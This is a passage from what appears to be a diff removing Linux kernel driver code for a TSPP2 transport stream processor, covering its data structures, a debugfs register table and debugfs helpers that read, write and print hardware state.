-- {"qsb_response_error_irq_clear", S_IWUSR,
-- TSPP2_QSB_RESPONSE_ERROR_IRQ_CLEAR},
-- {"qsb_response_error_irq_en", TSPP2_S_RW,
-- TSPP2_QSB_RESPONSE_ERROR_IRQ_ENABLE},
-- {"src_total_tsp_reset", S_IWUSR, TSPP2_SRC_TOTAL_TSP_RESET},
-- {"src_filtered_out_tsp_reset", S_IWUSR,
-- TSPP2_SRC_FILTERED_OUT_TSP_RESET},
-- {"data_not_sent_on_pipe_reset", S_IWUSR,
-- TSPP2_DATA_NOT_SENT_ON_PIPE_RESET},
-- {"version", S_IRUGO, TSPP2_VERSION},
-- /* Scrambling bits monitoring interrupt registers */
-- {"sc_go_high_status_0", S_IRUGO, TSPP2_SC_GO_HIGH_STATUS(0)},
-- {"sc_go_high_status_1", S_IRUGO, TSPP2_SC_GO_HIGH_STATUS(1)},
-- {"sc_go_high_status_2", S_IRUGO, TSPP2_SC_GO_HIGH_STATUS(2)},
-- {"sc_go_high_status_3", S_IRUGO, TSPP2_SC_GO_HIGH_STATUS(3)},
-- {"sc_go_high_clear_0", S_IWUSR, TSPP2_SC_GO_HIGH_CLEAR(0)},
-- {"sc_go_high_clear_1", S_IWUSR, TSPP2_SC_GO_HIGH_CLEAR(1)},
-- {"sc_go_high_clear_2", S_IWUSR, TSPP2_SC_GO_HIGH_CLEAR(2)},
-- {"sc_go_high_clear_3",
S_IWUSR, TSPP2_SC_GO_HIGH_CLEAR(3)},
-- {"sc_go_high_en_0", TSPP2_S_RW, TSPP2_SC_GO_HIGH_ENABLE(0)},
-- {"sc_go_high_en_1", TSPP2_S_RW, TSPP2_SC_GO_HIGH_ENABLE(1)},
-- {"sc_go_high_en_2", TSPP2_S_RW, TSPP2_SC_GO_HIGH_ENABLE(2)},
-- {"sc_go_high_en_3", TSPP2_S_RW, TSPP2_SC_GO_HIGH_ENABLE(3)},
-- {"sc_go_low_status_0", S_IRUGO, TSPP2_SC_GO_LOW_STATUS(0)},
-- {"sc_go_low_status_1", S_IRUGO, TSPP2_SC_GO_LOW_STATUS(1)},
-- {"sc_go_low_status_2", S_IRUGO, TSPP2_SC_GO_LOW_STATUS(2)},
-- {"sc_go_low_status_3", S_IRUGO, TSPP2_SC_GO_LOW_STATUS(3)},
-- {"sc_go_low_clear_0", S_IWUSR, TSPP2_SC_GO_LOW_CLEAR(0)},
-- {"sc_go_low_clear_1", S_IWUSR, TSPP2_SC_GO_LOW_CLEAR(1)},
-- {"sc_go_low_clear_2", S_IWUSR, TSPP2_SC_GO_LOW_CLEAR(2)},
-- {"sc_go_low_clear_3", S_IWUSR, TSPP2_SC_GO_LOW_CLEAR(3)},
-- {"sc_go_low_en_0", TSPP2_S_RW, TSPP2_SC_GO_LOW_ENABLE(0)},
-- {"sc_go_low_en_1", TSPP2_S_RW, TSPP2_SC_GO_LOW_ENABLE(1)},
-- {"sc_go_low_en_2", TSPP2_S_RW, TSPP2_SC_GO_LOW_ENABLE(2)},
-- {"sc_go_low_en_3", TSPP2_S_RW, TSPP2_SC_GO_LOW_ENABLE(3)},
--};
--
--/* Data structures */
--
--/**
-- * struct tspp2_tsif_device - TSIF device
-- *
-- * @base: TSIF device memory base address.
-- * @hw_index: TSIF device HW index (0 .. (TSPP2_NUM_TSIF_INPUTS - 1)).
-- * @dev: Back pointer to the TSPP2 device.
-- * @time_limit: TSIF device time limit
-- * (maximum time allowed between each TS packet).
-- * @ref_count: TSIF device reference count.
-- * @tsif_irq: TSIF device IRQ number.
-- * @mode: TSIF mode of operation.
-- * @clock_inverse: Invert input clock signal.
-- * @data_inverse: Invert input data signal.
-- * @sync_inverse: Invert input sync signal.
-- * @enable_inverse: Invert input enable signal.
-- * @debugfs_entrys: TSIF device debugfs entry.
-- * @stat_pkt_write_err: TSIF device packet write error statistics.
-- * @stat__pkt_read_err: TSIF device packet read error statistics.
-- * @stat_overflow: TSIF device overflow statistics.
-- * @stat_lost_sync: TSIF device lost sync statistics.
-- * @stat_timeout: TSIF device timeout statistics.
-- */
--struct tspp2_tsif_device {
-- void __iomem *base;
-- u32 hw_index;
-- struct tspp2_device *dev;
-- u32 time_limit;
-- u32 ref_count;
-- u32 tsif_irq;
-- enum tspp2_tsif_mode mode;
-- int clock_inverse;
-- int data_inverse;
-- int sync_inverse;
-- int enable_inverse;
-- struct dentry *debugfs_entry;
-- u32 stat_pkt_write_err;
-- u32 stat_pkt_read_err;
-- u32 stat_overflow;
-- u32 stat_lost_sync;
-- u32 stat_timeout;
--};
--
--/**
-- * struct tspp2_indexing_table - Indexing table
-- *
-- * @prefix_value: 4-byte common prefix value.
-- * @prefix_mask: 4-byte prefix mask.
-- * @entry_value: An array of 4-byte pattern values.
-- * @entry_mask: An array of corresponding 4-byte pattern masks.
-- * @num_valid_entries: Number of valid entries in the arrays.
-- */
--struct tspp2_indexing_table {
-- u32 prefix_value;
-- u32 prefix_mask;
-- u32 entry_value[TSPP2_NUM_INDEXING_PATTERNS];
-- u32 entry_mask[TSPP2_NUM_INDEXING_PATTERNS];
-- u16 num_valid_entries;
--};
--
--/**
-- * struct tspp2_event_work - Event work information
-- *
-- * @device: TSPP2 device back-pointer.
-- * @callback: Callback to invoke.
-- * @cookie: Cookie to pass to the callback.
-- * @event_bitmask: A bit mask of events to pass to the callback.
-- * @work: The work structure to queue.
-- * @link: A list element.
-- */
--struct tspp2_event_work {
-- struct tspp2_device *device;
-- void (*callback)(void *cookie, u32 event_bitmask);
-- void *cookie;
-- u32 event_bitmask;
-- struct work_struct work;
-- struct list_head link;
--};
--
--/**
-- * struct tspp2_filter - Filter object
-- *
-- * @opened: A flag to indicate whether the filter is open.
-- * @device: Back-pointer to the TSPP2 device the filter
-- * belongs to.
-- * @batch: The filter batch this filter belongs to.
-- * @src: Back-pointer to the source the filter is
-- * associated with.
-- * @hw_index: The filter's HW index.
-- * @pid_value: The filter's 13-bit PID value.
-- * @mask: The corresponding 13-bit bitmask.
-- * @context: The filter's context ID.
-- * @indexing_table_id: The ID of the indexing table this filter uses
-- * in case an indexing operation is set.
-- * @operations: An array of user-defined operations.
-- * @num_user_operations: The number of user-defined operations.
-- * @indexing_op_set: A flag to indicate an indexing operation
-- * has been set.
-- * @raw_op_with_indexing: A flag to indicate a Raw Transmit operation
-- * with support_indexing parameter has been set.
-- * @pes_analysis_op_set: A flag to indicate a PES Analysis operation
-- * has been set.
-- * @raw_op_set: A flag to indicate a Raw Transmit operation
-- * has been set.
-- * @pes_tx_op_set: A flag to indicate a PES Transmit operation
-- * has been set.
-- * @event_callback: A user callback to invoke when a filter event
-- * occurs.
-- * @event_cookie: A user cookie to provide to the callback.
-- * @event_bitmask: A bit mask of filter events
-- * TSPP2_FILTER_EVENT_XXX.
-- * @enabled: A flag to indicate whether the filter
-- * is enabled.
-- * @link: A list element. When the filter is associated
-- * with a source, it is added to the source's
-- * list of filters.
-- */
--struct tspp2_filter {
-- int opened;
-- struct tspp2_device *device;
-- struct tspp2_filter_batch *batch;
-- struct tspp2_src *src;
-- u16 hw_index;
-- u16 pid_value;
-- u16 mask;
-- u16 context;
-- u8 indexing_table_id;
-- struct tspp2_operation operations[TSPP2_MAX_OPS_PER_FILTER];
-- u8 num_user_operations;
-- int indexing_op_set;
-- int raw_op_with_indexing;
-- int pes_analysis_op_set;
-- int raw_op_set;
-- int pes_tx_op_set;
-- void (*event_callback)(void *cookie, u32 event_bitmask);
-- void *event_cookie;
-- u32 event_bitmask;
-- int enabled;
-- struct list_head link;
--};
--
--/**
-- * struct tspp2_pipe - Pipe object
-- *
-- * @opened: A flag to indicate whether the pipe is open.
-- * @device: Back-pointer to the TSPP2 device the pipe belongs to.
-- * @cfg: Pipe configuration parameters.
-- * @sps_pipe: The BAM SPS pipe.
-- * @sps_connect_cfg: SPS pipe connection configuration.
-- * @sps_event: SPS pipe event registration parameters.
-- * @desc_ion_handle: ION handle for the SPS pipe descriptors.
-- * @iova: TSPP2 IOMMU-mapped virtual address of the
-- * data buffer provided by the user.
-- * @hw_index: The pipe's HW index (for register access).
-- * @threshold: Pipe threshold.
-- * @ref_cnt: Pipe reference count. Incremented when pipe
-- * is attached to a source, decremented when it
-- * is detached from a source.
-- */
--struct tspp2_pipe {
-- int opened;
-- struct tspp2_device *device;
-- struct tspp2_pipe_config_params cfg;
-- struct sps_pipe *sps_pipe;
-- struct sps_connect sps_connect_cfg;
-- struct sps_register_event sps_event;
-- struct ion_handle *desc_ion_handle;
-- ion_phys_addr_t iova;
-- u32 hw_index;
-- u16 threshold;
-- u32 ref_cnt;
--};
--
--/**
-- * struct tspp2_output_pipe - Output pipe element to add to a source's list
-- *
-- * @pipe: A pointer to an output pipe object.
-- * @link: A list element. When an output pipe is attached to a source,
-- * it is added to the source's output pipe list. Note the same pipe
-- * can be attached to multiple sources, so we allocate an output
-- * pipe element to add to the list - we don't add the actual pipe.
-- */
--struct tspp2_output_pipe {
-- struct tspp2_pipe *pipe;
-- struct list_head link;
--};
--
--/**
-- * struct tspp2_filter_batch - Filter batch object
-- *
-- * @batch_id: Filter batch ID.
-- * @hw_filters: An array of HW filters that belong to this batch. When set, this
-- * indicates the filter is used. The actual HW index of a filter is
-- * calculated according to the index in this array along with the
-- * batch ID.
-- * @src: Back-pointer to the source the batch is associated with. This is
-- * also used to indicate this batch is "taken".
-- * @link: A list element.
When the batch is associated with a source, it
-- * is added to the source's list of filter batches.
-- */
--struct tspp2_filter_batch {
-- u8 batch_id;
-- int hw_filters[TSPP2_FILTERS_PER_BATCH];
-- struct tspp2_src *src;
-- struct list_head link;
--};
--
--/**
-- * struct tspp2_src - Source object
-- *
-- * @opened: A flag to indicate whether the source is open.
-- * @device: Back-pointer to the TSPP2 device the source
-- * belongs to.
-- * @hw_index: The source's HW index. This is used when writing
-- * to HW registers relevant for this source.
-- * There are registers specific to TSIF or memory
-- * sources, and there are registers common to all
-- * sources.
-- * @input: Source input type (TSIF / memory).
-- * @pkt_format: Input packet size and format for this source.
-- * @scrambling_bits_monitoring: Scrambling bits monitoring mode.
-- * @batches_list: A list of associated filter batches.
-- * @filters_list: A list of associated filters.
-- * @input_pipe: A pointer to the source's input pipe, if exists.
-- * @output_pipe_list: A list of output pipes attached to the source.
-- * For each pipe we also save whether it is
-- * stalling for this source.
-- * @num_associated_batches: Number of associated filter batches.
-- * @num_associated_pipes: Number of associated pipes.
-- * @num_associated_filters: Number of associated filters.
-- * @reserved_filter_hw_index: A HW filter index reserved for updating an
-- * active filter's operations.
-- * @event_callback: A user callback to invoke when a source event
-- * occurs.
-- * @event_cookie: A user cookie to provide to the callback.
-- * @event_bitmask: A bit mask of source events
-- * TSPP2_SRC_EVENT_XXX.
-- * @enabled: A flag to indicate whether the source
-- * is enabled.
-- */
--struct tspp2_src {
-- int opened;
-- struct tspp2_device *device;
-- u8 hw_index;
-- enum tspp2_src_input input;
-- enum tspp2_packet_format pkt_format;
-- enum tspp2_src_scrambling_monitoring scrambling_bits_monitoring;
-- struct list_head batches_list;
-- struct list_head filters_list;
-- struct tspp2_pipe *input_pipe;
-- struct list_head output_pipe_list;
-- u8 num_associated_batches;
-- u8 num_associated_pipes;
-- u32 num_associated_filters;
-- u16 reserved_filter_hw_index;
-- void (*event_callback)(void *cookie, u32 event_bitmask);
-- void *event_cookie;
-- u32 event_bitmask;
-- int enabled;
--};
--
--/**
-- * struct tspp2_global_irq_stats - Global interrupt statistics counters
-- *
-- * @tsp_invalid_af_control: Invalid adaptation field control bit.
-- * @tsp_invalid_length: Invalid adaptation field length.
-- * @pes_no_sync: PES sync sequence not found.
-- * @encrypt_level_err: Cipher operation configuration error.
-- */
--struct tspp2_global_irq_stats {
-- u32 tsp_invalid_af_control;
-- u32 tsp_invalid_length;
-- u32 pes_no_sync;
-- u32 encrypt_level_err;
--};
--
--/**
-- * struct tspp2_src_irq_stats - Memory source interrupt statistics counters
-- *
-- * @read_failure: Failure to read from memory input.
-- * @flow_control_stall: Input is stalled due to flow control.
-- */
--struct tspp2_src_irq_stats {
-- u32 read_failure;
-- u32 flow_control_stall;
--};
--
--/**
-- * struct tspp2_keytable_irq_stats - Key table interrupt statistics counters
-- *
-- * @key_not_ready: Ciphering keys are not ready in the key table.
-- */
--struct tspp2_keytable_irq_stats {
-- u32 key_not_ready;
--};
--
--/**
-- * struct tspp2_pipe_irq_stats - Pipe interrupt statistics counters
-- *
-- * @unexpected_reset: SW reset the pipe before all operations on this
-- * pipe ended.
-- * @qsb_response_error: TX operation ends with QSB error.
-- * @wrong_pipe_direction: Trying to use a pipe in the wrong direction.
-- */
--struct tspp2_pipe_irq_stats {
-- u32 unexpected_reset;
-- u32 qsb_response_error;
-- u32 wrong_pipe_direction;
--};
--
--/**
-- * struct tspp2_filter_context_irq_stats - Filter interrupt statistics counters
-- *
-- * @sc_go_high: Scrambling bits change from clear to encrypted.
-- * @sc_go_low: Scrambling bits change from encrypted to clear.
-- */
--struct tspp2_filter_context_irq_stats {
-- u32 sc_go_high;
-- u32 sc_go_low;
--};
--
--/**
-- * struct tspp2_irq_stats - Interrupt statistics counters
-- *
-- * @global: Global interrupt statistics counters
-- * @src: Memory source interrupt statistics counters
-- * @kt: Key table interrupt statistics counters
-- * @pipe: Pipe interrupt statistics counters
-- * @ctx: Filter context interrupt statistics counters
-- */
--struct tspp2_irq_stats {
-- struct tspp2_global_irq_stats global;
-- struct tspp2_src_irq_stats src[TSPP2_NUM_MEM_INPUTS];
-- struct tspp2_keytable_irq_stats kt[TSPP2_NUM_KEYTABLES];
-- struct tspp2_pipe_irq_stats pipe[TSPP2_NUM_PIPES];
-- struct tspp2_filter_context_irq_stats ctx[TSPP2_NUM_CONTEXTS];
--};
--
--/**
-- * struct tspp2_iommu_info - TSPP2 IOMMU information
-- *
-- * @hlos_group: TSPP2 IOMMU HLOS (Non-Secure) group.
-- * @cpz_group: TSPP2 IOMMU HLOS (Secure) group.
-- * @hlos_domain: TSPP2 IOMMU HLOS (Non-Secure) domain.
-- * @cpz_domain: TSPP2 IOMMU CPZ (Secure) domain.
-- * @hlos_domain_num: TSPP2 IOMMU HLOS (Non-Secure) domain number.
-- * @cpz_domain_num: TSPP2 IOMMU CPZ (Secure) domain number.
-- * @hlos_partition: TSPP2 IOMMU HLOS partition number.
-- * @cpz_partition: TSPP2 IOMMU CPZ partition number.
-- */
--struct tspp2_iommu_info {
-- struct iommu_group *hlos_group;
-- struct iommu_group *cpz_group;
-- struct iommu_domain *hlos_domain;
-- struct iommu_domain *cpz_domain;
-- int hlos_domain_num;
-- int cpz_domain_num;
-- int hlos_partition;
-- int cpz_partition;
--};
--
--/**
-- * struct tspp2_device - TSPP2 device
-- *
-- * @dev_id: TSPP2 device ID.
-- * @opened: A flag to indicate whether the device is open.
-- * @pdev: Platform device.
-- * @dev: Device structure, used for driver prints.
-- * @base: TSPP2 Device memory base address.
-- * @tspp2_irq: TSPP2 Device IRQ number.
-- * @bam_handle: BAM handle.
-- * @bam_irq: BAM IRQ number.
-- * @bam_props: BAM properties.
-- * @iommu_info: IOMMU information.
-- * @wakeup_src: A wakeup source to keep CPU awake when needed.
-- * @spinlock: A spinlock to protect accesses to
-- * data structures that happen from APIs and ISRs.
-- * @mutex: A mutex for mutual exclusion between API calls.
-- * @tsif_devices: An array of TSIF devices.
-- * @gdsc: GDSC power regulator.
-- * @bus_client: Client for bus bandwidth voting.
-- * @tspp2_ahb_clk: TSPP2 AHB clock.
-- * @tspp2_core_clk: TSPP2 core clock.
-- * @tspp2_vbif_clk: TSPP2 VBIF clock.
-- * @vbif_ahb_clk: VBIF AHB clock.
-- * @vbif_axi_clk: VBIF AXI clock.
-- * @tspp2_klm_ahb_clk: TSPP2 KLM AHB clock.
-- * @tsif_ref_clk: TSIF reference clock.
-- * @batches: An array of filter batch objects.
-- * @contexts: An array of context indexes. The index in this
-- * array represents the context's HW index, while
-- * the value represents whether it is used by a
-- * filter or free.
-- * @indexing_tables: An array of indexing tables.
-- * @tsif_sources: An array of source objects for TSIF input.
-- * @mem_sources: An array of source objects for memory input.
-- * @filters: An array of filter objects.
-- * @pipes: An array of pipe objects.
-- * @num_secured_opened_pipes: Number of secured opened pipes.
-- * @num_non_secured_opened_pipes: Number of non-secured opened pipes.
-- * @num_enabled_sources: Number of enabled sources.
-- * @work_queue: A work queue for invoking user callbacks.
-- * @event_callback: A user callback to invoke when a global event
-- * occurs.
-- * @event_cookie: A user cookie to provide to the callback.
-- * @event_bitmask: A bit mask of global events
-- * TSPP2_GLOBAL_EVENT_XXX.
-- * @debugfs_entry: TSPP2 device debugfs entry.
-- * @irq_stats: TSPP2 IRQ statistics.
-- * @free_work_list: A list of available work elements.
-- * @work_pool: A pool of work elements.
-- */
--struct tspp2_device {
-- u32 dev_id;
-- int opened;
-- struct platform_device *pdev;
-- struct device *dev;
-- void __iomem *base;
-- u32 tspp2_irq;
-- unsigned long bam_handle;
-- u32 bam_irq;
-- struct sps_bam_props bam_props;
-- struct tspp2_iommu_info iommu_info;
-- struct wakeup_source wakeup_src;
-- spinlock_t spinlock;
-- struct mutex mutex;
-- struct tspp2_tsif_device tsif_devices[TSPP2_NUM_TSIF_INPUTS];
-- struct regulator *gdsc;
-- uint32_t bus_client;
-- struct clk *tspp2_ahb_clk;
-- struct clk *tspp2_core_clk;
-- struct clk *tspp2_vbif_clk;
-- struct clk *vbif_ahb_clk;
-- struct clk *vbif_axi_clk;
-- struct clk *tspp2_klm_ahb_clk;
-- struct clk *tsif_ref_clk;
-- struct tspp2_filter_batch batches[TSPP2_NUM_BATCHES];
-- int contexts[TSPP2_NUM_AVAIL_CONTEXTS];
-- struct tspp2_indexing_table indexing_tables[TSPP2_NUM_INDEXING_TABLES];
-- struct tspp2_src tsif_sources[TSPP2_NUM_TSIF_INPUTS];
-- struct tspp2_src mem_sources[TSPP2_NUM_MEM_INPUTS];
-- struct tspp2_filter filters[TSPP2_NUM_AVAIL_FILTERS];
-- struct tspp2_pipe pipes[TSPP2_NUM_PIPES];
-- u8 num_secured_opened_pipes;
-- u8 num_non_secured_opened_pipes;
-- u8 num_enabled_sources;
-- struct workqueue_struct *work_queue;
-- void (*event_callback)(void *cookie, u32 event_bitmask);
-- void *event_cookie;
-- u32 event_bitmask;
-- struct dentry *debugfs_entry;
-- struct tspp2_irq_stats irq_stats;
-- struct list_head free_work_list;
-- struct tspp2_event_work work_pool[TSPP2_NUM_EVENT_WORK_ELEMENTS];
--};
--
--/* Global TSPP2 devices database */
--static struct tspp2_device *tspp2_devices[TSPP2_NUM_DEVICES];
--
--/* debugfs support */
--
--static int debugfs_iomem_x32_set(void *data, u64 val)
--{
-- int ret;
-- struct tspp2_device *device = tspp2_devices[0]; /* Assuming device 0 */
--
-- if (!device->opened)
--
return -ENODEV;
--
-- ret = pm_runtime_get_sync(device->dev);
-- if (ret < 0)
-- return ret;
--
-- writel_relaxed(val, data);
-- wmb();
--
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
--
-- return 0;
--}
--
--static int debugfs_iomem_x32_get(void *data, u64 *val)
--{
-- int ret;
-- struct tspp2_device *device = tspp2_devices[0]; /* Assuming device 0 */
--
-- if (!device->opened)
-- return -ENODEV;
--
-- ret = pm_runtime_get_sync(device->dev);
-- if (ret < 0)
-- return ret;
--
-- *val = readl_relaxed(data);
--
-- pm_runtime_mark_last_busy(device->dev);
-- pm_runtime_put_autosuspend(device->dev);
--
-- return 0;
--}
--
--DEFINE_SIMPLE_ATTRIBUTE(fops_iomem_x32, debugfs_iomem_x32_get,
-- debugfs_iomem_x32_set, "0x%08llX");
--
--static int debugfs_dev_open_set(void *data, u64 val)
--{
-- int ret = 0;
--
-- /* Assuming device 0 */
-- if (val == 1)
-- ret = tspp2_device_open(0);
-- else
-- ret = tspp2_device_close(0);
--
-- return ret;
--}
--
--static int debugfs_dev_open_get(void *data, u64 *val)
--{
-- struct tspp2_device *device = tspp2_devices[0]; /* Assuming device 0 */
--
-- *val = device->opened;
--
-- return 0;
--}
--
--DEFINE_SIMPLE_ATTRIBUTE(fops_device_open, debugfs_dev_open_get,
-- debugfs_dev_open_set, "0x%08llX");
--
--/**
-- * tspp2_tsif_debugfs_init() - TSIF device debugfs initialization.
-- *
-- * @tsif_device: TSIF device.
-- */
--static void tspp2_tsif_debugfs_init(struct tspp2_tsif_device *tsif_device)
--{
-- int i;
-- char name[10];
-- struct dentry *dentry;
-- void __iomem *base = tsif_device->base;
--
-- snprintf(name, 10, "tsif%i", tsif_device->hw_index);
-- tsif_device->debugfs_entry = debugfs_create_dir(name, NULL);
--
-- if (!tsif_device->debugfs_entry)
-- return;
--
-- dentry = tsif_device->debugfs_entry;
-- if (dentry) {
-- for (i = 0; i < ARRAY_SIZE(tsif_regs); i++) {
-- debugfs_create_file(
-- tsif_regs[i].name,
-- tsif_regs[i].mode,
-- dentry,
-- base + tsif_regs[i].offset,
-- &fops_iomem_x32);
-- }
-- }
--
-- dentry = debugfs_create_dir("statistics", tsif_device->debugfs_entry);
-- if (dentry) {
-- debugfs_create_u32(
-- "stat_pkt_write_err",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &tsif_device->stat_pkt_write_err);
--
-- debugfs_create_u32(
-- "stat_pkt_read_err",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &tsif_device->stat_pkt_read_err);
--
-- debugfs_create_u32(
-- "stat_overflow",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &tsif_device->stat_overflow);
--
-- debugfs_create_u32(
-- "stat_lost_sync",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &tsif_device->stat_lost_sync);
--
-- debugfs_create_u32(
-- "stat_timeout",
-- S_IRUGO | S_IWUSR | S_IWGRP,
-- dentry,
-- &tsif_device->stat_timeout);
-- }
--}
--
--static char *op_to_string(enum tspp2_operation_type op)
--{
-- switch (op) {
-- case TSPP2_OP_PES_ANALYSIS:
-- return "TSPP2_OP_PES_ANALYSIS";
-- case TSPP2_OP_RAW_TRANSMIT:
-- return "TSPP2_OP_RAW_TRANSMIT";
-- case TSPP2_OP_PES_TRANSMIT:
-- return "TSPP2_OP_PES_TRANSMIT";
-- case TSPP2_OP_PCR_EXTRACTION:
-- return "TSPP2_OP_PCR_EXTRACTION";
-- case TSPP2_OP_CIPHER:
-- return "TSPP2_OP_CIPHER";
-- case TSPP2_OP_INDEXING:
-- return "TSPP2_OP_INDEXING";
-- case TSPP2_OP_COPY_PACKET:
-- return "TSPP2_OP_COPY_PACKET";
-- default:
-- return "Invalid Operation";
-- }
--}
--
--static char *src_input_to_string(enum tspp2_src_input src_input)
--{
-- switch
(src_input) { -- case TSPP2_INPUT_TSIF0: -- return "TSPP2_INPUT_TSIF0"; -- case TSPP2_INPUT_TSIF1: -- return "TSPP2_INPUT_TSIF1"; -- case TSPP2_INPUT_MEMORY: -- return "TSPP2_INPUT_MEMORY"; -- default: -- return "Unknown source input type"; -- } --} -- --static char *pkt_format_to_string(enum tspp2_packet_format pkt_format) --{ -- switch (pkt_format) { -- case TSPP2_PACKET_FORMAT_188_RAW: -- return "TSPP2_PACKET_FORMAT_188_RAW"; -- case TSPP2_PACKET_FORMAT_192_HEAD: -- return "TSPP2_PACKET_FORMAT_192_HEAD"; -- case TSPP2_PACKET_FORMAT_192_TAIL: -- return "TSPP2_PACKET_FORMAT_192_TAIL"; -- default: -- return "Unknown packet format"; -- } --} -- --/** -- * debugfs service to print device information. -- */ --static int tspp2_device_debugfs_print(struct seq_file *s, void *p) --{ -- int count; -- int exist_flag = 0; -- struct tspp2_device *device = (struct tspp2_device *)s->private; -- -- seq_printf(s, "dev_id: %d\n", device->dev_id); -- seq_puts(s, "Enabled filters:"); -- for (count = 0; count < TSPP2_NUM_AVAIL_FILTERS; count++) -- if (device->filters[count].enabled) { -- seq_printf(s, "\n\tfilter%3d", count); -- exist_flag = 1; -- } -- if (!exist_flag) -- seq_puts(s, " none\n"); -- else -- seq_puts(s, "\n"); -- -- exist_flag = 0; -- seq_puts(s, "Opened filters:"); -- for (count = 0; count < TSPP2_NUM_AVAIL_FILTERS; count++) -- if (device->filters[count].opened) { -- seq_printf(s, "\n\tfilter%3d", count); -- exist_flag = 1; -- } -- if (!exist_flag) -- seq_puts(s, " none\n"); -- else -- seq_puts(s, "\n"); -- -- exist_flag = 0; -- seq_puts(s, "Opened pipes:\n"); -- for (count = 0; count < TSPP2_NUM_PIPES; count++) -- if (device->pipes[count].opened) { -- seq_printf(s, "\tpipe%2d\n", count); -- exist_flag = 1; -- } -- if (!exist_flag) -- seq_puts(s, " none\n"); -- else -- seq_puts(s, "\n"); -- -- return 0; --} -- --/** -- * debugfs service to print source information. 
-- */
--static int tspp2_src_debugfs_print(struct seq_file *s, void *p)
--{
-- struct tspp2_filter_batch *batch;
-- struct tspp2_filter *filter;
-- struct tspp2_output_pipe *output_pipe;
-- struct tspp2_src *src = (struct tspp2_src *)s->private;
--
-- if (!src) {
-- seq_puts(s, "error\n");
-- return 1;
-- }
-- seq_printf(s, "Status: %s\n", src->enabled ? "enabled" : "disabled");
-- seq_printf(s, "hw_index: %d\n", src->hw_index);
-- seq_printf(s, "event_bitmask: 0x%08X\n", src->event_bitmask);
-- if (src->input_pipe)
-- seq_printf(s, "input_pipe hw_index: %d\n",
-- src->input_pipe->hw_index);
-- seq_printf(s, "tspp2_src_input: %s\n", src_input_to_string(src->input));
-- seq_printf(s, "pkt_format: %s\n",
-- pkt_format_to_string(src->pkt_format));
-- seq_printf(s, "num_associated_batches: %d\n",
-- src->num_associated_batches);
--
-- if (src->num_associated_batches) {
-- seq_puts(s, "batch_ids: ");
-- list_for_each_entry(batch, &src->batches_list, link)
-- seq_printf(s, "%d ", batch->batch_id);
-- seq_puts(s, "\n");
-- }
--
-- seq_printf(s, "num_associated_pipes: %d\n", src->num_associated_pipes);
-- if (src->num_associated_pipes) {
-- seq_puts(s, "pipes_hw_idxs: ");
-- list_for_each_entry(output_pipe, &src->output_pipe_list, link) {
-- seq_printf(s, "%d ", output_pipe->pipe->hw_index);
-- }
-- seq_puts(s, "\n");
-- }
--
-- seq_printf(s, "reserved_filter_hw_index: %d\n",
-- src->reserved_filter_hw_index);
--
-- seq_printf(s, "num_associated_filters: %d\n",
-- src->num_associated_filters);
-- if (src->num_associated_filters) {
-- int i;
-- seq_puts(s, "Open filters:\n");
-- list_for_each_entry(filter, &src->filters_list, link) {
-- if (!filter->opened)
-- continue;
-- seq_printf(s, "\thw_index: %d\n",
-- filter->hw_index);
-- seq_printf(s, "\tStatus: %s\n",
-- filter->enabled ? "enabled"
-- : "disabled");
-- seq_printf(s, "\tpid_value: 0x%08X\n",
-- filter->pid_value);
-- seq_printf(s, "\tmask: 0x%08X\n", filter->mask);
-- seq_printf(s, "\tnum_user_operations: %d\n",
-- filter->num_user_operations);
-- if (filter->num_user_operations) {
-- seq_puts(
-- s, "\tTypes of operations:\n");
-- for (i = 0;
-- i < filter->num_user_operations; i++) {
-- seq_printf(s, "\t\t%s\n", op_to_string(
-- filter->operations[i].type));
-- }
-- }
-- }
--
-- } else {
-- seq_puts(s, "no filters\n");
-- }
--
-- return 0;
--}
--
--/**
-- * debugfs service to print filter information.
-- */
--static int filter_debugfs_print(struct seq_file *s, void *p)
--{
-- int i;
-- struct tspp2_filter *filter = (struct tspp2_filter *)s->private;
--
-- seq_printf(s, "Status: %s\n", filter->opened ? "opened" : "closed");
-- if (filter->batch)
-- seq_printf(s, "Located in batch %d\n", filter->batch->batch_id);
-- if (filter->src)
-- seq_printf(s, "Associated with src %d\n",
-- filter->src->hw_index);
-- seq_printf(s, "hw_index: %d\n", filter->hw_index);
-- seq_printf(s, "pid_value: 0x%08X\n", filter->pid_value);
-- seq_printf(s, "mask: 0x%08X\n", filter->mask);
-- seq_printf(s, "context: %d\n", filter->context);
-- seq_printf(s, "indexing_table_id: %d\n", filter->indexing_table_id);
-- seq_printf(s, "num_user_operations: %d\n", filter->num_user_operations);
-- seq_puts(s, "Types of operations:\n");
-- for (i = 0; i < filter->num_user_operations; i++)
-- seq_printf(s, "\t%s\n", op_to_string(
-- filter->operations[i].type));
-- seq_printf(s, "indexing_op_set: %d\n", filter->indexing_op_set);
-- seq_printf(s, "raw_op_with_indexing: %d\n",
-- filter->raw_op_with_indexing);
-- seq_printf(s, "pes_analysis_op_set: %d\n", filter->pes_analysis_op_set);
-- seq_printf(s, "raw_op_set: %d\n", filter->raw_op_set);
-- seq_printf(s, "pes_tx_op_set: %d\n", filter->pes_tx_op_set);
-- seq_printf(s, "Status: %s\n", filter->enabled ? "enabled" : "disabled");
--
-- if (filter->enabled) {
-- seq_printf(s, "Filter context-based counters, context %d\n",
-- filter->context);
-- seq_printf(s, "filter_tsp_sync_err = 0x%08X\n",
-- readl_relaxed(filter->device->base +
-- TSPP2_FILTER_TSP_SYNC_ERROR(filter->context)));
-- seq_printf(s, "filter_erred_tsp = 0x%08X\n",
-- readl_relaxed(filter->device->base +
-- TSPP2_FILTER_ERRED_TSP(filter->context)));
-- seq_printf(s, "filter_discontinuities = 0x%08X\n",
-- readl_relaxed(filter->device->base +
-- TSPP2_FILTER_DISCONTINUITIES(filter->context)));
-- seq_printf(s, "filter_sc_bits_discard = 0x%08X\n",
-- readl_relaxed(filter->device->base +
-- TSPP2_FILTER_SCRAMBLING_BITS_DISCARD(filter->context)));
-- seq_printf(s, "filter_tsp_total_num = 0x%08X\n",
-- readl_relaxed(filter->device->base +
-- TSPP2_FILTER_TSP_TOTAL_NUM(filter->context)));
-- seq_printf(s, "filter_discont_indicator = 0x%08X\n",
-- readl_relaxed(filter->device->base +
-- TSPP2_FILTER_DISCONT_INDICATOR(filter->context)));
